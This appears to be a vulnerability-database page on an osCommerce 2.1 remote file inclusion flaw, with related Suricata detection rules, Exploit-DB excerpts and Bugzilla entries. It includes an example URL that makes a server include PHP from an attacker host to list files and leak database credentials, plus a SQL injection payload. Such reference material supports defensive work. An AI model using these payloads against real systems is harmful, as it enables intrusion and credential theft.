CVE-2002-2019
Published: 2002-12-31
Priority: P3, 35
Severity: high, 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.65% (83.7th percentile)
PHP remote file inclusion vulnerability in include_once.php in osCommerce (a.k.a. Exchange Project) 2.1 allows remote attackers to execute arbitrary PHP code via the include_file parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oscommerce | oscommerce | — | — |
Suricata
GPL RPC portmap ypserv request UDP
suricata·2010-09-23
CVE-2000-1042 GPL RPC portmap ypserv request UDP
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET 111 (msg:"GPL RPC portmap ypserv request UDP"; content:"|00 01 86 A0|"; depth:4; offset:12; content:"|00 00 00 03|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; content:"|00 01 86 A4|"; within:4; content:"|00 00 00 00|"; depth:4; offset:4; reference:arachnids,12; reference:bugtraq,5914; reference:bugtraq,6016; reference:cve,2000-1042; reference:cve,2000-1043; reference:cve,2002-1232; classtype:rpc-portmap-decode; sid:2100590; rev:13; metadata:created_at 2010_09_23, cve CVE_2000_1042, signature_severity Informational, updated_at 2019_07_26;)
Suricata
GPL NETBIOS DCERPC IrotIsRunning attempt
suricata·2010-09-23
CVE-2002-1561 GPL NETBIOS DCERPC IrotIsRunning attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC IrotIsRunning attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_test:4,>,128,0,relative; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103238; rev:4; metadata:created_at 2010_09_23, cve CVE_2002_1561, signature_severity Informational, updated_at 2019_07_26;)
Suricata
GPL EXPLOIT kadmind buffer overflow attempt
suricata·2010-09-23
CVE-2002-1226 GPL EXPLOIT kadmind buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 749 (msg:"GPL EXPLOIT kadmind buffer overflow attempt"; flow:established,to_server; content:"|00 C0 05 08 00 C0 05 08 00 C0 05 08 00 C0 05 08|"; reference:bugtraq,5731; reference:bugtraq,6024; reference:cve,2002-1226; reference:cve,2002-1235; reference:url,www.kb.cert.org/vuls/id/875073; classtype:shellcode-detect; sid:2101894; rev:9; metadata:created_at 2010_09_23, cve CVE_2002_1226, confidence High, signature_severity Major, updated_at 2019_07_26;)
Suricata
GPL SQL Slammer Worm propagation attempt
suricata·2010-09-23
CVE-2002-0649 GPL SQL Slammer Worm propagation attempt
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"GPL SQL Slammer Worm propagation attempt"; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1 01|"; content:"sock"; content:"send"; reference:bugtraq,5310; reference:bugtraq,5311; reference:cve,2002-0649; reference:nessus,11214; reference:url,vil.nai.com/vil/content/v_99992.htm; classtype:misc-attack; sid:2102003; rev:9; metadata:created_at 2010_09_23, cve CVE_2002_0649, confidence Medium, signature_severity Informational, updated_at 2019_07_26;)
Suricata
GPL EXPLOIT kadmind buffer overflow attempt
suricata·2010-09-23
CVE-2002-1226 GPL EXPLOIT kadmind buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 751 (msg:"GPL EXPLOIT kadmind buffer overflow attempt"; flow:established,to_server; content:"|FF FF|KADM0.0A|00 00 FB 03|"; reference:bugtraq,5731; reference:bugtraq,6024; reference:cve,2002-1226; reference:cve,2002-1235; reference:url,www.kb.cert.org/vuls/id/875073; classtype:shellcode-detect; sid:2101897; rev:9; metadata:created_at 2010_09_23, cve CVE_2002_1226, confidence High, signature_severity Major, updated_at 2019_07_26;)
Suricata
GPL FTP SITE CPWD overflow attempt
suricata·2010-09-23
CVE-2002-0826 GPL FTP SITE CPWD overflow attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP SITE CPWD overflow attempt"; flow:established,to_server; content:"SITE"; nocase; content:"CPWD"; distance:0; nocase; isdataat:100,relative; pcre:"/^SITE\s+CPWD\s[^\n]{100}/smi"; reference:bugtraq,5427; reference:cve,2002-0826; classtype:misc-attack; sid:2101888; rev:9; metadata:created_at 2010_09_23, cve CVE_2002_0826, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
GPL SNMP public access udp
suricata·2010-09-23
CVE-1999-0517 GPL SNMP public access udp
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET 161 (msg:"GPL SNMP public access udp"; content:"public"; fast_pattern; reference:bugtraq,2112; reference:bugtraq,4088; reference:bugtraq,4089; reference:cve,1999-0517; reference:cve,2002-0012; reference:cve,2002-0013; classtype:attempted-recon; sid:2101411; rev:13; metadata:created_at 2010_09_23, cve CVE_1999_0517, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_10_08;)
Suricata
GPL SNMP private access udp
suricata·2010-09-23
CVE-2002-0012 GPL SNMP private access udp
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET 161 (msg:"GPL SNMP private access udp"; content:"private"; fast_pattern; reference:bugtraq,4088; reference:bugtraq,4089; reference:bugtraq,4132; reference:bugtraq,7212; reference:cve,2002-0012; reference:cve,2002-0013; classtype:attempted-recon; sid:2101413; rev:12; metadata:created_at 2010_09_23, cve CVE_2002_0012, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_10_08;)
Suricata
GPL EXPLOIT kadmind buffer overflow attempt
suricata·2010-09-23
CVE-2002-1226 GPL EXPLOIT kadmind buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 751 (msg:"GPL EXPLOIT kadmind buffer overflow attempt"; flow:established,to_server; content:"|00 C0 05 08 00 C0 05 08 00 C0 05 08 00 C0 05 08|"; reference:bugtraq,5731; reference:bugtraq,6024; reference:cve,2002-1226; reference:cve,2002-1235; reference:url,www.kb.cert.org/vuls/id/875073; classtype:shellcode-detect; sid:2101895; rev:9; metadata:created_at 2010_09_23, cve CVE_2002_1226, confidence High, signature_severity Major, updated_at 2019_07_26;)
Exploit-DB
Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass
exploitdb·2019-12-03
---
# Exploit Title: Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass
# Discovery by: hyp3rlinx
# Date: 2019-12-03
# Vendor Homepage: www.microsoft.com
# CVE: N/A
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-MEDIA-CENTER-MOTW-BYPASS-XXE-ANNIVERSARY-EDITION.txt
[+] ISR: Apparition Security
[Vendor]
www.microsoft.com
[Product]
Microsoft Windows Media Center
Windows Media Center is a discontinued digital video recorder and media player created by Microsoft.
Media Center was first introduced to Windows in 2002 on Windows XP Media Center.
[Vulnerability Type]
XML External Entity MotW Bypass (Anniversar
Exploit-DB
Hospital-Management 1.26 - 'fname' SQL Injection
exploitdb·2019-09-18
---
# Exploit Title: Hospital-Management 1.26 - 'fname' SQL Injection
# Author: Cakes
# Discovery Date: 2019-09-18
# Vendor Homepage: https://github.com/Mugerwa-Joseph/hospital-management
# Software Link: https://github.com/Mugerwa-Joseph/hospital-management/archive/master.zip
# Tested Version: 1.26
# Tested on OS: CentOS 7
# CVE: N/A
# Description:
# Simple SQL injection after application authentication.
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload:
fname=tester'||(SELECT 0x72516679 FROM DUAL WHERE 9119=9119 AND 1379=1379)||'&sname=tester&[email protected]&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add
# Type: error-based
# Title: MySQL >=
Exploit-DB
osCommerce 2.1 - Remote File Inclusion
exploitdb·2002-06-16
CVE-2002-2019 osCommerce 2.1 - Remote File Inclusion
---
source: https://www.securityfocus.com/bid/5037/info
osCommerce is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver.
-------- Example 1 --------
http://SERVER/catalog/inludes/include_once.php?
include_file=http://MYBOX/a.php
--- a.php ---
Output: dir listing of the current directory
-------- Example 2 --------
http://SERVER/catalog/inludes/include_once.php?
include_file=http://MYBOX/b.php
--- b.php ---
Output: outputs the application_top.php file which includes MySQL username,
password, etc.
Bugzilla
CVE-2019-15860 Xpdf: Xpdf 2.00 allows a SIGSEGV in XRef::constructXRef in XRef.cc
bugzilla·2019-10-01·CVSS 5.5
CVE-2019-15860 [MEDIUM] CVE-2019-15860 Xpdf: Xpdf 2.00 allows a SIGSEGV in XRef::constructXRef in XRef.cc
Xpdf 2.00 allows a SIGSEGV in XRef::constructXRef in XRef.cc. NOTE: 2.00 is a
version from November 2002.
References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-15860
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15860
https://gist.github.com/RootUp/b5de893bb2e51a4c846c5a0caa13b666
Discussion:
Created xpdf tracking bugs for this issue:
Affects: epel-all [bug 1757629]
Affects: fedora-all [bug 1757628]
---
This CVE Bugzilla entry is for community support informational purposes only as it does not affect a package in a commercially supported Red Hat product. Refer to the dependent bugs for status of those individual community products.
Bugzilla
CVE-2019-9075 binutils: heap-based buffer overflow in function _bfd_archive_64_bit_slurp_armap in archive64.c
bugzilla·2019-02-25·CVSS 7.8
CVE-2019-9075 [HIGH] CVE-2019-9075 binutils: heap-based buffer overflow in function _bfd_archive_64_bit_slurp_armap in archive64.c
An issue was discovered in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils 2.32. It is a heap-based buffer overflow in _bfd_archive_64_bit_slurp_armap in archive64.c.
Reference:
https://sourceware.org/bugzilla/show_bug.cgi?id=24236
Discussion:
Created binutils tracking bugs for this issue:
Affects: fedora-all [bug 1680670]
---
```
==6814== Memcheck, a memory error detector
==6814== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==6814== Using Valgrind-3.14.0 and LibVEX; rerun with -h for copyright info
==6814== Command: size poc
==6814==
==6814== Invalid write of size 1
==6814== at 0x4F27D5C: _bfd_archive_64_bit_slurp_ar
```
References:
http://archives.neohapsis.com/archives/bugtraq/2002-06/0188.html
http://www.iss.net/security_center/static/9369.php
http://www.oscommerce.com/about.php/news%2C72
http://www.securityfocus.com/bid/5037